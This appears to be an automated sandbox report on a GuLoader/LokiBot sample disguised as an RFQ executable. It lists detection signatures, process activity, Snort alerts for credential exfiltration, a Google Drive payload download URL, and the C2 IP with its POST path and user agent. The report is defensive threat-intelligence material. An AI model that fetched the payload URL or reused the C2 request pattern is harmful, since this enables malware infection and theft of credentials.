Play interactive tour

Edit tour

Windows Analysis Report RFQ No3756368.exe

Overview

General Information

Sample Name:	RFQ No3756368.exe
Analysis ID:	434725
MD5:	ce51f15d31008c3606729b00036fe841
SHA1:	9ed0987c6a26f61afb6fa772dce9b4a6ddd9090c
SHA256:	e4effdebb79bd1b3d2e3a2510a96f44cbf9ca4961340c7ca1f276bd3c527afb2
Tags:	exeLoki
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Machine Learning detection for sample

Potentially malicious time measurement code found

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

RFQ No3756368.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\RFQ No3756368.exe' MD5: CE51F15D31008C3606729B00036FE841)

RFQ No3756368.exe (PID: 6824 cmdline: 'C:\Users\user\Desktop\RFQ No3756368.exe' MD5: CE51F15D31008C3606729B00036FE841)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=178gAB7Kg_oMzCSAzqF9y5fIXkgVf7x0t"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
RFQ No3756368.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RFQ No3756368.exe

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=178gAB7Kg_oMzCSAzqF9y5fIXkgVf7x0t"}

Multi AV Scanner detection for submitted file

Show sources

Source: RFQ No3756368.exe

Virustotal: Detection: 26%

Perma Link

Machine Learning detection for sample

Show sources

Source: RFQ No3756368.exe

Joe Sandbox ML: detected

Source: RFQ No3756368.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 142.250.201.193:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 63.141.228.141:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=178gAB7Kg_oMzCSAzqF9y5fIXkgVf7x0t

Source: Joe Sandbox View

IP Address: 63.141.228.141 63.141.228.141

Source: Joe Sandbox View

ASN Name: NOCIXUS NOCIXUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 163Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141

Source: unknown

DNS traffic detected: queries for: doc-14-7g-docs.googleusercontent.com

Source: unknown

HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Jun 2021 11:03:17 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2

Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://63.141.228.141/32.php/nuldTOn9SBn3G
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp, RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9u2nstv2
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/ytq
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 142.250.201.193:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261706 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251014 EnumWindows,NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251973 NtWriteVirtualMemory,TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261DA6 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A99B NtWriteVirtualMemory,NtAllocateVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258E3C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258A39 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226220C NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258212 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262268 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225926A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02259670 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AA72 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226225C NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261E58 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258EA6 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022582A2 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261EAC NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022586A8 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022596BF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261EC2 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258ACF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B2DB NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262327 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225833D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225873D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226173E NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262304 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AB0A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02259310 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258F63 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B72 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257F55 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B58 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022623B6 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261FBB NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262795 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258FEC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257FEE NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225ABE8 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022583F7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022617F4 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022593FC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022587DF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258C2B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258035 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AC3B NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226200D NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258864 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258068 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226206B NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225847A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226244D NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022594B4 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A8B7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022620BE NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225908C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022594EB NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022580CF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022624DF NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B0DF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225912D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258530 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225C133 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D3F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AD03 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D14 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258118 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226256B NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225BD7B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225894C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225814F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258557 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022581B0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261DB3 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022595E0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022585F3 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022591D7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A9D8 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572D40 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A72 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572E96 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572B07 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A77 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572DF6 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572DF8 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A65 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572BAB NtProtectVirtualMemory,

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225E27F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251014
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251973
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A99B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B62B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258E3C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258A39
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225223A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255202
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258212
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260A6E
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225926A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251270
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AA72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251E43
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256E42
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251A56
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251E5B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225EAA4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258EA6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022582A2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251EAF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022552A9
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022586A8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252A86
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252697
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260AE6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022532E4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255AE7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251AFF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258ACF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256ECE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02253AD7
